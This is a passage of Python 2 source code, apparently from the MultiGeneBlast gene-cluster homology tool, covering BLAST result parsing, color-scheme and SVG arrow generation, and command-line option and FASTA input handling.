elif i == blastlines[-1]: #Only for the last blastline
if query not in querylist:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y":
blastdict[last_query] = [subjectlist,querydict]
querylist.append(query)
subjectlist = []
querydict = {}
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
blastdict[query] = [subjectlist,querydict]
querylist.append(query)
else:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y":
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
blastdict[query] = [subjectlist,querydict]
else: #For all but the first and last blastlines
if query not in querylist:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y" or "genbank" not in dbname:
blastdict[last_query] = [subjectlist,querydict]
querylist.append(query)
subjectlist = []
querydict = {}
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
last_query = query
else:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y" or "genbank" not in dbname:
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
hitnr += 1
return [blastdict,querylist]
def generate_rgbscheme(nr):
usablenumbers = [1,2,4,8,12,18,24,32,48,64,10000]
lengthsdict = {1:[1,1,1],2:[1,1,2],4:[1,2,2],8:[2,2,2],12:[2,2,3],18:[2,3,3],24:[3,3,3],32:[3,3,4],48:[3,4,4],64:[4,4,4]}
shortestdistance = 10000
for i in usablenumbers:
distance = i - nr
if distance >= 0:
if distance < shortestdistance:
shortestdistance = distance
closestnr = i
toohigh = "n"
if closestnr == 10000:
toohigh = "y"
closestnr = 64
xyznumbers = lengthsdict[closestnr]
x = xyznumbers[0]
y = xyznumbers[1]
z = xyznumbers[2]
xpoints = []
xpoint = (255/z)/2
for i in range(x):
xpoints.append(xpoint)
xpoint += (255/x)
ypoints = []
ypoint = (255/z)/2
for i in range(y):
ypoints.append(ypoint)
ypoint += (255/y)
zpoints = []
zpoint = (255/z)/2
for i in range(z):
zpoints.append(zpoint)
zpoint += (255/z)
colorlist = []
for i in xpoints:
for j in ypoints:
for k in zpoints:
rgb = "rgb(" + str(i) + "," + str(j) + "," + str(k) + ")"
colorlist.append(rgb)
if toohigh == "y":
colorlist = colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist
if closestnr == 24:
colorlist = colorlist[:15] + colorlist[18:]
if closestnr == 32:
colorlist = colorlist[:21] + colorlist[24:]
colorlist2 = []
if closestnr == 1:
colorlist2.append("red")
if closestnr == 2:
colorlist2.append("red")
colorlist2.append("green")
if closestnr == 4:
colorlist2.append("red")
colorlist2.append("green")
colorlist2.append("blue")
colorlist2.append("yellow")
if closestnr == 8:
neworder=[4,1,2,5,6,7,3,0]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 12:
neworder=[6,3,5,9,7,2,11,4,8,1,10,0]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 18:
neworder=[9,6,2,14,15,8,12,10,3,5,7,11,4,1,16,13,0]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 24:
neworder=[15,12,9,6,5,0,21,1,16,14,8,17,2,23,22,3,13,7,10,4,18,20,19,11]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 32:
neworder = [21,19,27,6,8,1,14,7,20,13,9,30,4,23,18,12,5,29,24,17,11,31,2,28,22,15,26,3,20,16,10,25]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr > 32:
random.shuffle(colorlist)
colorlist2 = colorlist
colorlist = colorlist2
return colorlist
def _gene_arrow(start,end,strand,color,base,height):
halfheight = height/2
if start > end:
start2 = end
end2 = start
start = start2
end = end2
oh = ShapeBuilder()
if (end - start) < halfheight:
if (strand == "+"):
pointsAsTuples=[(start,base),
(end,base - halfheight),
(start,base - height),
(start,base)
]
if (strand == "-"):
pointsAsTuples=[(start,base - halfheight),
(end,base - height),
(end,base),
(start,base - halfheight)
]
else:
if (strand == "+"):
arrowstart = end-halfheight
pointsAsTuples=[(start,base),
(arrowstart,base),
(end,base-halfheight),
(arrowstart,base - height),
(start,base - height),
(start,base)
]
if (strand == "-"):
arrowstart = start + halfheight
pointsAsTuples=[(start,base - halfheight),
(arrowstart,base - height),
(end,base - height),
(end,base),
(arrowstart,base),
(start,base - halfheight)
]
pg=oh.createPolygon(points=oh.convertTupleArrayToPoints(pointsAsTuples),strokewidth=1, stroke='black', fill=color)
return pg
def relativepositions(starts, ends, largestclustersize, screenwidth):
rel_starts = []
rel_ends = []
#Assign relative start and end sites for visualization
lowest_start = int(starts[0])
leftboundary = lowest_start
for i in starts:
i = float(float(int(i) - int(leftboundary)) / largestclustersize) * float(screenwidth * 0.75)
i = int(i)
rel_starts.append(i)
for i in ends:
i = float(float(int(i) - int(leftboundary)) / largestclustersize) * float(screenwidth * 0.75)
i = int(i)
rel_ends.append(i)
return [rel_starts,rel_ends]
def startendsitescheck(starts,ends):
#Check whether start sites are always lower than end sites, reverse if necessary
starts2 = []
ends2 = []
a = 0
for i in starts:
if int(i) > int(ends[a]):
starts2.append(ends[a])
ends2.append(i)
else:
starts2.append(i)
ends2.append(ends[a])
a += 1
ends = ends2
starts = starts2
return [starts,ends]
def calculate_colorgroups(queryclusternumber,hitclusternumbers,queryclusterdata,internalhomologygroupsdict):
#Extract data and generate color scheme
hitclusterdata = queryclusterdata[queryclusternumber][1]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
colorgroupsdict = {}
colorgroupslengthlist = []
colorgroupslist = []
for hitclusternumber in hitclusternumbers:
colorgroups = hitclusterdata[hitclusternumber][0][hitclusternumber]
colorgroupsdict[hitclusternumber] = colorgroups
colorgroupslengthlist.append(len(colorgroups))
colorgroupslist.append(colorgroups)
metacolorgroups = []
internalgroups = internalhomologygroupsdict[queryclusternumber]
for i in internalgroups:
metagroup = []
for j in i:
for m in colorgroupslist:
for l in m:
if j in l:
for k in l:
if k not in metagroup:
metagroup.append(k)
if len(metagroup) > 1 and metagroup not in metacolorgroups:
metacolorgroups.append(metagroup)
#Generate RGB scheme
rgbcolorscheme = generate_rgbscheme(len(metacolorgroups))
rgbcolorscheme.append("#FFFFFF")
#Create colorschemedict in which all genes that are hits of the same query gene get the same color
colorschemedict = {}
z = 0
for i in queryclustergenes:
for j in metacolorgroups:
if i in j:
for l in j:
if colorschemedict.has_key(l):
pass
else:
colorschemedict[l] = z
if z in colorschemedict.values():
z += 1
return colorschemedict,rgbcolorscheme
def clusterblastresults(queryclusternumber,hitclusternumbers,queryclusterdata,colorschemedict,rgbcolorscheme, screenwidth, arch_search, allhits="n"):
#print "Generating svg for cluster",queryclusternumber
#Extract data and generate color scheme
nrhitclusters = queryclusterdata[1][0]
hitclusterdata = queryclusterdata[1][1]
if nrhitclusters == 0:
s = svg(x = 0, y = 0, width = (screenwidth * 0.75), height = (2770))
viewbox = "0 0 " + str(screenwidth * 0.8) + " " + str(2950)
s.set_viewBox(viewbox)
s.set_preserveAspectRatio("none")
return [s,[{},{},{}]]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
queryclustergenesdetails = hitclusterdata[hitclusterdata.keys()[0]][4]
colorgroupsdict = {}
colorgroupslengthlist = []
colorgroupslist = []
for hitclusternumber in hitclusternumbers:
colorgroups = hitclusterdata[hitclusternumber][0][hitclusternumber]
colorgroupsdict[hitclusternumber] = colorgroups
colorgroupslengthlist.append(len(colorgroups))
colorgroupslist.append(colorgroups)
#Find out whether hit gene cluster needs to be inverted compared to query gene cluster
strandsbalancedict = {}
for m in hitclusternumbers:
hitclustergenesdetails = hitclusterdata[m][2]
strandsbalance = 0
for i in queryclustergenes:
refstrand = queryclustergenesdetails[i][2]
for j in colorgroupsdict[m]:
if i in j:
for k in j:
if k in hitclusterdata[m][1] and hitclustergenesdetails[k][2] == refstrand:
strandsbalance += 1
elif k in hitclusterdata[m][1] and hitclusterdata[m][2][k][2] != refstrand:
strandsbalance = strandsbalance - 1
strandsbalancedict[m] = strandsbalance
#Generate coordinates for SVG figure
qnrgenes = len(queryclustergenes)
qstarts =[]
qends = []
qstrands =[]
qcolors = []
for i in queryclustergenes:
qgenedata = queryclustergenesdetails[i]
if qgenedata[0] > qgenedata[1]:
qstarts.append(qgenedata[0])
qends.append(qgenedata[1])
else:
qstarts.append(qgenedata[1])
qends.append(qgenedata[0])
qstrands.append(qgenedata[2])
if colorschemedict.has_key(i):
qcolors.append(colorschemedict[i])
else:
qcolors.append("white")
qstarts_ends = startendsitescheck(qstarts,qends)
qstarts = qstarts_ends[0]
qends = qstarts_ends[1]
hdata = {}
for m in hitclusternumbers:
hitclustergenes = hitclusterdata[m][1]
hitclustergenesdetails = hitclusterdata[m][2]
hnrgenes = len(hitclustergenes)
hstarts =[]
hends = []
hstrands =[]
hcolors = []
for i in hitclustergenes:
hgenedata = hitclustergenesdetails[i]
if int(hgenedata[0]) > int(hgenedata[1]):
hstarts.append(hgenedata[0])
hends.append(hgenedata[1])
else:
hstarts.append(hgenedata[1])
hends.append(hgenedata[0])
hstrands.append(hgenedata[2])
if colorschemedict.has_key(i):
hcolors.append(colorschemedict[i])
else:
hcolors.append("white")
#Invert gene cluster if needed
if strandsbalancedict[m] < 0:
hstarts2 = []
hends2 = []
hstrands2 = []
for i in hstarts:
hstarts2.append(str(100000000 - int(i)))
hstarts = hstarts2
hstarts.reverse()
for i in hends:
hends2.append(str(100000000 - int(i)))
hends = hends2
hends.reverse()
hstarts, hends = hends, hstarts
for i in hstrands:
if i == "+":
hstrands2.append("-")
elif i == "-":
hstrands2.append("+")
hstrands = hstrands2
hstrands.reverse()
hcolors.reverse()
#Sort genes properly and remove duplicates
stranddict = {}
colorsdict = {}
y = 0
sortstarts = []
for n in hstarts:
while n in sortstarts:
n = str(int(n) + 1)
sortstarts.append(n)
for n in sortstarts:
stranddict[int(n)] = hstrands[y]
w = y + 1
try:
nextstart = sortstarts[w]
except:
nextstart = 0
color = hcolors[y]
if color == "white":
while int(nextstart) == int(n):
if len(hcolors) > w and hcolors[w] != 'white':
color = hcolors[w]
break
w += 1
try:
nextstart = sortstarts[w]
except:
break
if not colorsdict.has_key(int(n)) or colorsdict[int(n)] == "white":
colorsdict[int(n)] = color
y += 1
hstarts = [int(l) for l in hstarts]
#hstarts = dict.fromkeys(hstarts).keys()
hstarts.sort()
hstarts = [str(n) for n in hstarts]
hends = [int(l) for l in hends]
#hends = dict.fromkeys(hends).keys()
hends.sort()
hends = [str(n) for n in hends]
hstrands = sortdictvaluesbykeys(stranddict)
hcolors = sortdictvaluesbykeys(colorsdict)
hstarts_ends = startendsitescheck(hstarts,hends)
hstarts = hstarts_ends[0]
hends = hstarts_ends[1]
hdata[m] = [hstarts,hends,hstrands,hcolors]
#Resize all gene clusters to normal sizes
#Find largest hit cluster
approxclustersizes = []
for m in hitclusternumbers:
hstarts,hends,hstrands,hcolors = hdata[m]
x = 0
first = -1
last = int(hends[-1])
for n in hcolors:
if n != "white" and first == -1:
first = int(hstarts[x])
last = int(hends[x])
elif n != "white" and first != -1:
last = int(hends[x])
x += 1
approxclustersizes.append((int(last)-int(first)))
approxclustersizes.append(int(qends[-1]) - int(qstarts[0]))
largestsize = int(int(max(approxclustersizes)) + 5000)
#Resize all clusters
hdata2 = {}
savedpositions = {}
for m in hitclusternumbers:
hstarts,hends,hstrands,hcolors = hdata[m]
x = 0
first = -1
last = 0
for n in hcolors:
if n != "white" and first == -1:
first = min(int(hstarts[x]), int(hends[x]))
if max(int(hstarts[x]), int(hends[x])) > last:
last = max(int(hstarts[x]), int(hends[x]))
elif n != "white" and first != -1:
if min(int(hstarts[x]), int(hends[x])) < first:
first = min(int(hstarts[x]), int(hends[x]))
if max(int(hstarts[x]), int(hends[x])) > last:
last = max(int(hstarts[x]), int(hends[x]))
x += 1
approxclustersize = (int(last)-int(first))
piecetobeadded = (largestsize - approxclustersize) / 2
#if min([(first - int(hstarts[0])),(int(hends[-1]) - last)]) < piecetobeadded - 1:
# piecetobeadded = min([(first - int(hstarts[0])),(int(hends[-1]) - last)])
if piecetobeadded < 0:
piecetobeadded = 0
newcstart = int(first) - piecetobeadded
newcend = int(last) + piecetobeadded
firstentry = 1000000000
lastentry = -1
x = 0
for i in hstarts:
hstart = int(i)
hend = int(hends[x])
if firstentry == 1000000000 and hend >= newcstart:
firstentry = x
lastentry = x + 1
elif hstart <= newcend:
lastentry = x + 1
x += 1
#print str(cstart) + " " + str(cend) + " " + str(newcstart) + " " + str(newcend)
hstarts = hstarts[firstentry:lastentry]
hends = hends[firstentry:lastentry]
hstrands = hstrands[firstentry:lastentry]
hcolors = hcolors[firstentry:lastentry]
hdata2[m] = [hstarts,hends,hstrands,hcolors]
savedpositions[m] = [hstarts,hends]
hdata = hdata2
#Find cluster size of largest cluster of query & all hit clusters assessed
clustersizes = []
for m in hitclusternumbers:
pstarts = [int(n) for n in hdata[m][1]]
pends = [int(n) for n in hdata[m][0]]
locations = pstarts + pends
hclustersize = abs(max(locations) - min(locations))
clustersizes.append(hclustersize)
qpositions = [int(q) for q in qends] + [int(q) for q in qstarts]
qclustersize = abs(max(qpositions) - min(qpositions))
clustersizes.append(qclustersize)
largestclustersize = max(clustersizes)
#Find relative positions
qrelpositions = relativepositions(qstarts,qends,largestclustersize, screenwidth)
qrel_starts = qrelpositions[0]
qrel_ends = qrelpositions[1]
qdata = [qrel_starts,qrel_ends,qstrands,qcolors]
hdata2 = {}
qdata2 = []
q_adjusted = False
for m in hitclusternumbers:
hclustersize = int(hdata[m][1][-1]) - int(hdata[m][0][0])
hrelpositions = relativepositions(hdata[m][0],hdata[m][1],largestclustersize, screenwidth)
hrel_starts = hrelpositions[0]
hrel_ends = hrelpositions[1]
#Center-align smallest gene cluster
if largestclustersize == hclustersize:
if q_adjusted == False:
q_adjusted = True
qrel_ends2 = []
qrel_starts2 = []
for i in qrel_starts:
qrel_starts2.append(int(i) + int(float(float((largestclustersize - qclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
for i in qrel_ends:
qrel_ends2.append(int(i) + int(float(float((largestclustersize - qclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
qrel_ends = qrel_ends2
qrel_starts = qrel_starts2
else:
hrel_ends2 = []
hrel_starts2 = []
for i in hrel_starts:
hrel_starts2.append(int(i) + int(float(float((largestclustersize - hclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
for i in hrel_ends:
hrel_ends2.append(int(i) + int(float(float((largestclustersize - hclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
hrel_ends = hrel_ends2
hrel_starts = hrel_starts2
hdata2[m] = [hrel_starts,hrel_ends,hdata[m][2],hdata[m][3]]
qdata2 = [qrel_starts,qrel_ends,qdata[2],qdata[3]]
hdata = hdata2
qdata = qdata2
s = svg(x = 0, y = 0, width = (screenwidth * 0.75), height = 2770)
viewbox = "0 0 " + str(screenwidth * 0.8) + " " + str(2680)
s.set_viewBox(viewbox)
s.set_preserveAspectRatio("none")
#Add line behind query gene cluster gene arrows, except for architecture searches
oh = ShapeBuilder()
if arch_search == "n":
group = g()
group.addElement(oh.createLine(10,35,10 + (screenwidth * 0.75),35, strokewidth = 1, stroke = "grey"))
s.addElement(group)
#Add query gene cluster gene arrows
a = 0
y = 0
for x in range(qnrgenes):
group = g()
#group.addElement(_gene_label(rel_starts[a],rel_ends[a],genes[a],y,screenwidth))
if qcolors[a] == "white":
group.addElement(_gene_arrow(10 + qrel_starts[a],10 + qrel_ends[a],qstrands[a],rgbcolorscheme[-1],40,10))
else:
group.addElement(_gene_arrow(10 + qrel_starts[a],10 + qrel_ends[a],qstrands[a],rgbcolorscheme[qcolors[a]],40,10))
#Can be used for domains
#group.addElement(oh.createRect(rel_starts[a],45,(rel_ends[a]-rel_starts[a]),10, strokewidth = 2, stroke = "black", fill="#237845"))
if allhits == "n":
group.set_id("q" + str(queryclusternumber) + "_" + str(hitclusternumbers[0]) + "_" + "%s"%x)
else:
group.set_id("all_" + str(queryclusternumber) + "_0_" + "%s"%x)
s.addElement(group)
if y == 0:
y = 1
elif y == 1:
y = 0
a += 1
for m in hitclusternumbers:
group = g()
group.addElement(oh.createLine(10,35 + 50 * (hitclusternumbers.index(m) + 1),10 + (screenwidth * 0.75),35 + 50 * (hitclusternumbers.index(m) + 1), strokewidth = 1, stroke = "grey"))
s.addElement(group)
#Add hit gene cluster gene arrows
hitclustergenes = hitclusterdata[m][1]
hrel_starts = hdata[m][0]
hnrgenes = len(hrel_starts)
hrel_ends = hdata[m][1]
hstrands = hdata[m][2]
hcolors = hdata[m][3]
a = 0
y = 0
for x in range(hnrgenes):
group = g()
#group.addElement(_gene_label(rel_starts[a],rel_ends[a],genes[a],y,screenwidth))
if hcolors[a] == "white":
group.addElement(_gene_arrow(10 + hrel_starts[a],10 + hrel_ends[a],hstrands[a],rgbcolorscheme[-1],40 + 50 * (hitclusternumbers.index(m) + 1),10))
else:
group.addElement(_gene_arrow(10 + hrel_starts[a],10 + hrel_ends[a],hstrands[a],rgbcolorscheme[hcolors[a]],40 + 50 * (hitclusternumbers.index(m) + 1),10))
#Can be used for domains
# group.addElement(oh.createRect(rel_starts[a],45,(rel_ends[a]-rel_starts[a]),10, strokewidth = 2, stroke = "black", fill="#237845"))
if allhits == "n":
group.set_id("h" + str(queryclusternumber) + "_" + str(m) + "_" + "%s"%x)
else:
group.set_id("all_" + str(queryclusternumber) + "_" + str(m) + "_" + "%s"%x)
s.addElement(group)
if y == 0:
y = 1
elif y == 1:
y = 0
a += 1
return [s,[qdata,hdata,strandsbalancedict,savedpositions]]
def log(message, exit=False, retcode=1, stdout=False):
if GUI == "y":
OUTBOX.text_insert(message + "\n")
FRAME.update()
if exit:
sys.exit(retcode)
else:
"Log to stderr and logfile and optionally exit"
if stdout:
print message
else:
print >> sys.stderr, message
logfile = open('multigeneblast.log', 'a', 1)
logfile.write(message + '\n')
logfile.close()
if exit:
sys.exit(retcode)
def inputinstructions():
return """MultiGeneBlast 1.1.0 arguments:
Usage: multigeneblast [options]
Options (x is an integer number)
-in <file name> : Query file name: GBK/EMBL file for homology search,
FASTA file with multiple protein sequences for
architecture search
-from <x> : Start position of query region
-to <x> : End position of query region
-genes <acc,acc;...> : Accession codes of genes constituting query
multigene module
-out <folder name> : Output folder in which results will be stored
-db <db name> : Blast database to be queried (default: genbank_mf)
-cores <x> : Number of parallel CPUs to use for threading
(default: all)
-hitspergene : Number of Blast hits per query gene to be taken
into account (default: 250).
-minseqcov <x> : Minimal % coverage of a Blast hit on hit protein
sequence to be taken into account (default: 25)
-minpercid <x> : Minimal % identity of a Blast hit on hit protein
sequence to be taken into account (default: 30)
-distancekb <x> : Maximum kb distance between two blast hits to be
counted as belonging to the same locus (default: 10)
-syntenyweight <x> : Weight of synteny conservation in hit sorting score
: (default: 0.5)
-muscle <y/n> : generate Muscle multiple sequence alignments of
all hits of each input gene (default: n)
-outpages <x> : Maximum number of output pages (with 50 hits each)
to be generated (default: 5)"""
def default_options(opts):
#Implement defaults
opts.db = "genbank_mf"
opts.cores = "all"
opts.minseqcov = 25
opts.minpercid = 30
opts.screenwidth = 1024
opts.hitspergene = 250
opts.distancekb = 20000
opts.muscle = "n"
opts.startpos = "N/A"
opts.endpos = "N/A"
opts.ingenes = "N/A"
opts.pages = 5
opts.gui = "n"
opts.syntenyweight = 0.5
def invalidoptions(argument):
print "From the command line, input multigeneblast -help for more information."
if len(argument) > 0:
log("Invalid options input: %s" % argument, exit=True)
def collect_identifiers(options):
#identify option identifiers
identifiers = []
for i in options:
if i[0] == "-":
if i not in identifiers:
identifiers.append(i)
else:
invalidoptions("No '-' in given options or option given twice.")
return identifiers
def determine_cpu_nr(cores):
#Determine number of CPUs used
if cores == "all":
try:
nrcpus = multiprocessing.cpu_count()
except(IOError,OSError,NotImplementedError):
nrcpus = 1
else:
try:
nrcpus = multiprocessing.cpu_count()
except(IOError,OSError,NotImplementedError):
nrcpus = 1
if cores < nrcpus:
nrcpus = cores
return nrcpus
def process_identifiers(identifiers, opts, options):
infile, startpos, endpos, ingenes, outfolder = "n","n","n","n","n"
genes_tag_used = "n"
fromto_tag_used = "n"
fastafile = "n"
global CURRENTDIR
for i in identifiers:
if i == "-help" or i == "--help" or i == "-h":
print inputinstructions()
sys.exit(1)
else:
value = options[options.index(i) + 1].strip()
if i == "-from":
fromto_tag_used = "y"
if genes_tag_used == "y":
print "Please either the -from and -to tags, or the -genes tag to select genes."
invalidoptions(i)
if value.isdigit():
opts.startpos = int(value)
startpos = "y"
else:
invalidoptions(i)
elif i == "-to":
fromto_tag_used = "y"
if genes_tag_used == "y":
print "Please either the -from and -to tags, or the -genes tag to select genes."
invalidoptions(i)
if value.isdigit():
opts.endpos = int(value)
endpos = "y"
else:
invalidoptions(i)
elif i == "-genes":
genes_tag_used = "y"
if fromto_tag_used == "y":
print "Please either the -from and -to tags, or the -genes tag to select genes."
invalidoptions(i)
if "," in value:
opts.ingenes = [gene for gene in value.split(",") if gene != ""]
ingenes = "y"
else:
invalidoptions(i)
elif i == "-in":
if sys.platform == ('win32') and os.sep not in value:
value = CURRENTDIR + os.sep + value
elif os.sep not in value or value[0] != os.sep:
value = CURRENTDIR + os.sep + value
root, ext = os.path.splitext(value)
if ext.lower() not in [".gbk",".gb",".genbank",".embl",".emb",".fasta",".fas",".fa",".fna"]:
print "Please supply input file with valid GBK / EMBL extension (homology search) or FASTA extension (architecture search)."
invalidoptions(i)
if value in os.listdir(".") or (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] in os.listdir(value.rpartition(os.sep)[0])):
opts.infile = value
infile = "y"
if ext.lower() in [".fasta",".fas",".fa",".fna"]:
fastafile = "y"
else:
print "Specified input file not found..."
invalidoptions(i)
elif i == "-out":
value = value.replace(".","").replace("_","")
if not value.replace("_","").replace("_","").replace("..","").replace(os.sep,"").isalnum():
print "Not a valid output folder name. Please use alpha-numerical characters only"
invalidoptions(i)
if sys.platform == ('win32') and value.count(os.sep) == 1 and value[0] == os.sep:
invalidoptions(i)
opts.outputfolder = value
if opts.outputfolder[0] == os.sep and ".." in opts.outputfolder:
invalidoptions(i)
elif os.sep in value[0] and not os.path.exists(value.rpartition(os.sep)[0]):
invalidoptions(i)
elif os.sep in opts.outputfolder and ".." in opts.outputfolder:
startdir = CURRENTDIR
while ".." in opts.outputfolder:
if ".." not in opts.outputfolder.partition(os.sep)[0]:
invalidoptions(i)
opts.outputfolder = opts.outputfolder.partition(os.sep)[2]
startdir = startdir.rpartition(os.sep)[0]
if len(startdir) < 1:
invalidoptions(i)
if opts.outputfolder[0] == os.sep:
opts.outputfolder = startdir + opts.outputfolder
else:
opts.outputfolder = startdir + os.sep + opts.outputfolder
elif os.sep not in opts.outputfolder:
opts.outputfolder = CURRENTDIR + os.sep + opts.outputfolder
elif opts.outputfolder[0] == os.sep:
opts.outputfolder = opts.outputfolder
elif os.sep in opts.outputfolder and os.sep not in opts.outputfolder[0]:
opts.outputfolder = CURRENTDIR + os.sep + opts.outputfolder
else:
invalidoptions(i)
if os.path.exists(opts.outputfolder):
print "Warning: Overwriting existing folder"
for xhtmlfile in [filename for filename in os.listdir(opts.outputfolder) if "xhtml" in filename]:
os.remove(opts.outputfolder + os.sep + xhtmlfile)
outfolder = "y"
else:
try:
os.mkdir(opts.outputfolder)
except:
invalidoptions(i)
outfolder = "y"
elif i == "-db":
global MGBPATH
global DBPATH
value = value.partition(".pal")[0].partition(".nal")[0]
if sys.platform == ('win32') and os.sep not in value:
value = CURRENTDIR + os.sep + value
elif os.sep not in value or value[0] != os.sep:
value = CURRENTDIR + os.sep + value
if not value + ".pal" in os.listdir(MGBPATH) and not value + ".pal" in os.listdir(".") and not value + ".pal" in os.listdir(CURRENTDIR) and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".pal" in os.listdir(value.rpartition(os.sep)[0])):
if not value + ".phr" in os.listdir(MGBPATH) and not value + ".phr" in os.listdir(".") and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".phr" in os.listdir(value.rpartition(os.sep)[0])):
if not value + ".nal" in os.listdir(MGBPATH) and not value + ".nal" in os.listdir(".") and not value + ".nal" in os.listdir(CURRENTDIR) and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".nal" in os.listdir(value.rpartition(os.sep)[0])):
if not value + ".nhr" in os.listdir(MGBPATH) and not value + ".nhr" in os.listdir(".") and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".nhr" in os.listdir(value.rpartition(os.sep)[0])):
print "Error: Database not found; database should have accompanying .phr, .psq and .pin files."
invalidoptions(i)
opts.db = value
if value + ".pal" in os.listdir(MGBPATH) or value + ".nal" in os.listdir(MGBPATH):
DBPATH = MGBPATH
elif value + ".pal" in os.listdir(CURRENTDIR) or value + ".nal" in os.listdir(CURRENTDIR):
DBPATH = CURRENTDIR
elif value + ".pal" in os.listdir(".") or value + ".nal" in os.listdir("."):
DBPATH = os.getcwd()
elif os.sep in value and value[0] != os.sep and os.path.exists(os.getcwd() + os.sep + value.rpartition(os.sep)[0]) and ((value.rpartition(os.sep)[2] + ".pal" in os.listdir(os.getcwd() + os.sep + value.rpartition(os.sep)[0])) or (value.rpartition(os.sep)[2] + ".nal" in os.listdir(os.getcwd() + os.sep + value.rpartition(os.sep)[0]))):
DBPATH = os.getcwd() + os.sep + value.rpartition(os.sep)[0]
opts.db = value.rpartition(os.sep)[2]
elif os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and (value.rpartition(os.sep)[2] + ".pal" in os.listdir(value.rpartition(os.sep)[0]) or value.rpartition(os.sep)[2] + ".nal" in os.listdir(value.rpartition(os.sep)[0])):
DBPATH = value.rpartition(os.sep)[0]
opts.db = value.rpartition(os.sep)[2]
else:
print "Error: Database not found; database should have accompanying .phr, .psq and .pin or .nhr, .nsq and .nin files."
invalidoptions(i)
os.environ['BLASTDB'] = DBPATH
if opts.db + ".pal" in os.listdir(DBPATH):
opts.dbtype = "prot"
elif opts.db + ".nal" in os.listdir(DBPATH):
opts.dbtype = "nucl"
elif i == "-cores":
if value.isdigit() and int(value) in range(1,1000):
opts.cores = int(value)
else:
invalidoptions(i)
elif i == "-minseqcov":
if value.isdigit() and int(value) in range(0,100):
opts.minseqcov = int(value)
else:
invalidoptions(i)
elif i == "-minpercid":
if value.isdigit() and int(value) in range(0,100):
opts.minpercid = int(value)
else:
invalidoptions(i)
elif i == "-distancekb":
if value.isdigit() and int(value) in range(1,100):
opts.distancekb = int(value) * 1000
else:
print "Error: please select a number between 1-100."
invalidoptions(i)
elif i == "-syntenyweight":
if (value.isdigit() or (value.count(".") == 1 and value.partition(".")[0].isdigit() and value.partition(".")[2].isdigit())) and float(value) <= 2.0 and float(value) >= 0.0:
opts.syntenyweight = float(value)
else:
print "Error: please select a number between 0.0 and 2.0."
invalidoptions(i)
elif i == "-hitspergene":
if value.isdigit() and int(value) in range(50,10001):
opts.hitspergene = int(value)
else:
print "Error: please select a number between 50-10000."
invalidoptions(i)
elif i == "-muscle":
if value == "y" or value == "n":
opts.muscle = value
else:
invalidoptions(i)
elif i == "-outpages":
if value.isdigit() and int(value) in range(0,41):
opts.pages = int(value)
else:
print "Error: please select a number between 0-40."
invalidoptions(i)
else:
invalidoptions(i)
#Stop process if options are provided with a FASTA file that do not belong with it
if fastafile == "y" and (genes_tag_used == "y" or fromto_tag_used == "y"):
print "Error: -from, -to and -genes tags are incompatible with architecture search (FASTA input)"
sys.exit(1)
#Stop process if inadequate options are supplied.
if infile == "n" or ("n" in [startpos, endpos] and ingenes == "n" and ".fa" not in opts.infile.partition(".")[1] + opts.infile.partition(".")[2]) or outfolder == "n":
print "Input error. An input file, an outputfolder and a query region (for EMBL/GBK inputs) must be supplied."
invalidoptions(" ".join(options))
def parse_options(args, opts):
#Run GUI if no arguments supplied
if len(args) < 2:
args = "-h"
default_options(opts)
#Read user-specified options which may override defaults
if len(args) >= 2:
options = args
if "-" in options[-1] and (args[1] != "-help" and args[1] != "--help" and args[1] != "-h"):
invalidoptions(options[-1])
identifiers = collect_identifiers(options)
process_identifiers(identifiers, opts, options)
nrcpus = determine_cpu_nr(opts.cores)
opts.nrcpus = nrcpus
def generate_architecture_data(fastafile):
try:
file = open(fastafile,"r")
except:
log("Error: no or invalid input file: " + fastafile, exit=True)
filetext = file.read()
filetext = filetext.replace("\r","\n")
fasta_entries = [">" + entry.replace("\n\n","\n").replace("\n\n","\n") for entry in filetext.split(">")][1:]
querytags = []
seqs = []
seqlengths = {}
seqdict = {}
for entry in fasta_entries:
if "\n" not in entry or len(entry.partition("\n")[2]) < 2:
log("FASTA file wrongly formatted at. Please check your input file.")
log("Wrong entry: " + entry.replace("\n",""), exit=True)
fname = entry.partition("\n")[0][1:]
#Generate name without forbidden characters
forbiddencharacters = ["'",'"','=',';',':','[',']','>','<','|','\\',"/",'*','-','_','.',',','?',')','(','^','#','!','`','~','+','{','}','@','$','%','&']
fname_censored = ""
for z in fname:
if z not in forbiddencharacters:
fname_censored = fname
fname = fname_censored.replace(" ","_")[:20].replace('|','_')
seq = entry.partition("\n")[2].replace(" ","").replace("\n","")
if fname in querytags:
log("Non-unique sequence name in input FASTA file. Please reformat and try again.", exit=True)
querytags.append(fname)
seqs.append(seq)
seqlengths[fname] = len(seq)
seqdict[fname] = seq
